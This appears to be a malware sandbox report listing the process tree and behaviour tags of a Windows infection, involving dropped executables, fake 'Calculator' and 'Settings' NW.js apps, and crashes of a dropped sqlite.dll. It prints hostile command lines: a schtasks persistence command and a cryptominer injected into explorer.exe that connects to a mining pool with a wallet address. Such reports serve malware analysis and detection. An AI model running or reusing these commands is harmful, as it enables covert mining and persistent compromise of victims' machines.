C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1580,13367423575095916401,18102399774735308680,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw11212_1097521996" --mojo-platform-channel-handle=1716 /prefetch:86⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1580,13367423575095916401,18102399774735308680,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw11212_1097521996" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1596 /prefetch:26⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1580,13367423575095916401,18102399774735308680,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw11212_1097521996" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2484 /prefetch:16⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1580,13367423575095916401,18102399774735308680,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw11212_1097521996" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3176 /prefetch:26⤵
- Modifies registry class
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1580,13367423575095916401,18102399774735308680,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw11212_1097521996" --mojo-platform-channel-handle=3256 /prefetch:86⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1580,13367423575095916401,18102399774735308680,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw11212_1097521996" --mojo-platform-channel-handle=2696 /prefetch:86⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1580,13367423575095916401,18102399774735308680,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw11212_1097521996" --mojo-platform-channel-handle=3660 /prefetch:86⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1580,13367423575095916401,18102399774735308680,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw11212_1097521996" --mojo-platform-channel-handle=2348 /prefetch:86⤵
- Loads dropped DLL
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,13367423575095916401,18102399774735308680,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw11212_1097521996" --mojo-platform-channel-handle=3448 /prefetch:86⤵
-
C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"3⤵
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"4⤵
-
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"5⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"6⤵
- Creates scheduled task(s)
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"5⤵
-
C:\Users\Admin\AppData\Roaming\services64.exeC:\Users\Admin\AppData\Roaming\services64.exe6⤵
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\services64.exe"7⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"8⤵
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "/sihost64"9⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.udda/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6OAdluV/h8Wx+uVST9CwRTBBZDSizq+6yEkb73lzV2SG" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=60 --tls --cinit-stealth8⤵
-
C:\Users\Admin\AppData\Local\Temp\10.exe"C:\Users\Admin\AppData\Local\Temp\10.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8A27D4C3\Wed0971f17486f8.exeC:\Users\Admin\AppData\Local\Temp\7zS8A27D4C3\Wed0971f17486f8.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS8A27D4C3\Wed09b3a5ca1a712d390.exeWed09b3a5ca1a712d390.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\4316430.exe"C:\Users\Admin\AppData\Roaming\4316430.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\5699730.exe"C:\Users\Admin\AppData\Roaming\5699730.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\6454724.exe"C:\Users\Admin\AppData\Roaming\6454724.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\788088.exe"C:\Users\Admin\AppData\Roaming\788088.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"3⤵
- Drops file in Windows directory
- Enumerates system info in registry
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6396 -s 4482⤵
- Program crash
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 6396 -ip 63961⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 4092 -ip 40921⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 2212 -ip 22121⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 3320 -ip 33201⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 4468 -ip 44681⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 672 -p 6364 -ip 63641⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 2176 -ip 21761⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 516 -p 7024 -ip 70241⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 5584 -ip 55841⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 1120 -ip 11201⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 680 -p 2624 -ip 26241⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 716 -p 2852 -ip 28521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 748 -p 5048 -ip 50481⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 572 -p 3652 -ip 36521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 688 -p 5964 -ip 59641⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 5196 -ip 51961⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe 8339b8a3901ebc775730ad458de2a583 OA4En7LMH0egnJJlDMRm8Q.0.1.0.3.01⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 6780 -ip 67801⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 1528 -ip 15281⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 1988 -ip 19881⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 5912 -ip 59121⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k wsappx -p -s AppXSvc1⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 748 -p 2496 -ip 24961⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 648 -p 7556 -ip 75561⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 7548 -ip 75481⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 7752 -ip 77521⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7920 -s 4563⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 7396 -ip 73961⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 776 -p 7920 -ip 79201⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7684 -s 4483⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 792 -p 7684 -ip 76841⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 6516 -ip 65161⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 768 -p 5900 -ip 59001⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding FE93CA095283BE95C896B6F9B860EEFB C2⤵
- Loads dropped DLL
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding D16043A1CD30750A36DA477DF81D5B8A C2⤵
- Loads dropped DLL
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 0917CA864B128D49C7FD491ACCF936BB2⤵
- Blocklisted process makes network request
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding B09FF2FDECD680D28AAC9554887447B7 C2⤵
-
C:\Users\Admin\AppData\Roaming\Settings\Settings\prerequisites\aipackagechainer.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings\prerequisites\aipackagechainer.exe"2⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Settings\Settings\prerequisites\RequiredApplication_1\Settings%20Installation.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings\prerequisites\RequiredApplication_1\Settings%20Installation.exe" -silent=1 -CID=778 -SID=778 -submn=default3⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" "--iUSIg"4⤵
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exeC:\Users\Admin\AppData\Roaming\Settings\Settings.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Settings\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Settings\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Settings\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Settings\User Data" --annotation=plat=Win64 --annotation=prod=Settings --annotation=ver=0.0.13 --initial-client-data=0x1fc,0x1f8,0x1f4,0x21c,0x1f0,0x7ffcc565dec0,0x7ffcc565ded0,0x7ffcc565dee05⤵
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exeC:\Users\Admin\AppData\Roaming\Settings\Settings.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Settings\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Settings\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Settings --annotation=ver=0.0.13 --initial-client-data=0x13c,0x140,0x144,0x118,0x148,0x7ff60da79e70,0x7ff60da79e80,0x7ff60da79e906⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=gpu-process --field-trial-handle=1568,3857027269367445464,10599222446413653248,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw656_1664148247" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1584 /prefetch:25⤵
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Settings\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1568,3857027269367445464,10599222446413653248,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw656_1664148247" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2584 /prefetch:15⤵
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Settings\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1568,3857027269367445464,10599222446413653248,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw656_1664148247" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --mojo-platform-channel-handle=2496 /prefetch:15⤵
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1568,3857027269367445464,10599222446413653248,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw656_1664148247" --mojo-platform-channel-handle=2412 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1568,3857027269367445464,10599222446413653248,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw656_1664148247" --mojo-platform-channel-handle=1992 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=gpu-process --field-trial-handle=1568,3857027269367445464,10599222446413653248,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw656_1664148247" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3184 /prefetch:25⤵
- Modifies registry class
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1568,3857027269367445464,10599222446413653248,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw656_1664148247" --mojo-platform-channel-handle=3240 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1568,3857027269367445464,10599222446413653248,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw656_1664148247" --mojo-platform-channel-handle=3612 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1568,3857027269367445464,10599222446413653248,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw656_1664148247" --mojo-platform-channel-handle=3616 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1568,3857027269367445464,10599222446413653248,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw656_1664148247" --mojo-platform-channel-handle=1828 /prefetch:85⤵
-
C:\Users\Admin\AppData\Roaming\Settings\Settings.exe"C:\Users\Admin\AppData\Roaming\Settings\Settings.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1568,3857027269367445464,10599222446413653248,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Settings\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw656_1664148247" --mojo-platform-channel-handle=1576 /prefetch:85⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_D0BC.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Settings\Settings\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Settings\Settings\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Settings\Settings\prerequisites' -retry_count 10"3⤵
- Blocklisted process makes network request
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5304 -s 4523⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 5304 -ip 53041⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 10004 -ip 100041⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 9944 -ip 99441⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 508 -p 6000 -ip 60001⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 8732 -ip 87321⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Loads dropped DLL
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in Windows directory
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 752 -p 6048 -ip 60481⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 9480 -ip 94801⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 7248 -ip 72481⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 760 -p 9480 -ip 94801⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 400 -p 11560 -ip 115601⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
-
